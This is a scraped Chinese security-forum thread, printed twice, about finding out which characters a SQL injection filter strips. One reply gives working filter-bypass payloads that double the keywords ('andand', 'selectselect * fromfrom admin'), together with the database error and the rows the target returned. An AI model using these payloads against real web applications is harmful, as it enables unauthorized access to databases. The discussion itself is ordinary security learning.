[求助]sql注入怎样准确地探查哪些字符被过滤了？-WEB安全-看雪-安全社区|安全招聘|kanxue.com

最新回复 (5)
netwind 雪币： 14363 活跃值： (3930) 能力值： (RANK：520 ) 在线值：发帖 86 回帖 844 粉丝 26 关注私信	netwind 13 2 楼很多是利用正则匹配来过滤的，绕过了正则表达式可能就绕过了过滤 2017-5-22 23:01 0
自由的翅膀雪币： 30 活跃值： (236) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 104 粉丝 0 关注私信	自由的翅膀 3 楼 netwind 很多是利用正则匹配来过滤的，绕过了正则表达式可能就绕过了过滤但是我只输入select的时候，被过滤了，而//select//就没事，select都是一样出现了的啊...... 2017-5-23 07:59 0
自由的翅膀雪币： 30 活跃值： (236) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 104 粉丝 0 关注私信	自由的翅膀 4 楼自由的翅膀但是我只输入select的时候，被过滤了，而//select//就没事，select都是一样出现了的啊...... 正则表达式能匹配到select，那么//select//应该也能匹配到的吧........ 2017-5-23 08:00 0
netwind 雪币： 14363 活跃值： (3930) 能力值： (RANK：520 ) 在线值：发帖 86 回帖 844 粉丝 26 关注私信	netwind 13 5 楼你研究一下正则表达式就明白了 2017-5-23 13:37 0
hdog 雪币： 4 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 8 粉丝 0 关注私信	hdog 6 楼刚刚在另外一个哥们儿那里贴了这个攻略，不过不算是自己绕过的。实际上将被过滤的关键字改成selectselect （注意空格）也是可以成功的使用1' and 1=1 or ''=' 返回 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1=1 or ''=''' at line 1。因为and被过滤掉使用1' andand%20%201=1 or''=' 返回 ID: 1' and 1=1 or''=' name: baloteli ID: 1' and 1=1 or''=' name: kanawaluo ID: 1' and 1=1 or''=' name: dengdeng 这里将空格写成%20是为了明显的显示出来需要两个空格 d4dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3y4@1k6U0g2Q4x3X3g2K6K9r3W2&6j5h3&6T1j5i4u0Q4x3X3g2U0L8$3#2Q4x3V1j5@1x3U0y4Q4x3V1k6%4k6h3u0Q4x3V1k6Q4x3@1k6A6k6q4)9K6c8q4)9J5y4W2)9J5x3K6x3&6i4K6y4n7i4K6t1$3L8X3u0K6M7q4)9K6b7R3`.`. or exists (selectselect * fromfrom admin) andand ''=' 2017-5-24 11:26 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (5)
netwind 雪币： 14363 活跃值： (3930) 能力值： (RANK：520 ) 在线值：发帖 86 回帖 844 粉丝 26 关注私信	netwind 13 2 楼很多是利用正则匹配来过滤的，绕过了正则表达式可能就绕过了过滤 2017-5-22 23:01 0
自由的翅膀雪币： 30 活跃值： (236) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 104 粉丝 0 关注私信	自由的翅膀 3 楼 netwind 很多是利用正则匹配来过滤的，绕过了正则表达式可能就绕过了过滤但是我只输入select的时候，被过滤了，而//select//就没事，select都是一样出现了的啊...... 2017-5-23 07:59 0
自由的翅膀雪币： 30 活跃值： (236) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 104 粉丝 0 关注私信	自由的翅膀 4 楼自由的翅膀但是我只输入select的时候，被过滤了，而//select//就没事，select都是一样出现了的啊...... 正则表达式能匹配到select，那么//select//应该也能匹配到的吧........ 2017-5-23 08:00 0
netwind 雪币： 14363 活跃值： (3930) 能力值： (RANK：520 ) 在线值：发帖 86 回帖 844 粉丝 26 关注私信	netwind 13 5 楼你研究一下正则表达式就明白了 2017-5-23 13:37 0
hdog 雪币： 4 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 8 粉丝 0 关注私信	hdog 6 楼刚刚在另外一个哥们儿那里贴了这个攻略，不过不算是自己绕过的。实际上将被过滤的关键字改成selectselect （注意空格）也是可以成功的使用1' and 1=1 or ''=' 返回 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1=1 or ''=''' at line 1。因为and被过滤掉使用1' andand%20%201=1 or''=' 返回 ID: 1' and 1=1 or''=' name: baloteli ID: 1' and 1=1 or''=' name: kanawaluo ID: 1' and 1=1 or''=' name: dengdeng 这里将空格写成%20是为了明显的显示出来需要两个空格 d4dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3y4@1k6U0g2Q4x3X3g2K6K9r3W2&6j5h3&6T1j5i4u0Q4x3X3g2U0L8$3#2Q4x3V1j5@1x3U0y4Q4x3V1k6%4k6h3u0Q4x3V1k6Q4x3@1k6A6k6q4)9K6c8q4)9J5y4W2)9J5x3K6x3&6i4K6y4n7i4K6t1$3L8X3u0K6M7q4)9K6b7R3`.`. or exists (selectselect * fromfrom admin) andand ''=' 2017-5-24 11:26 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复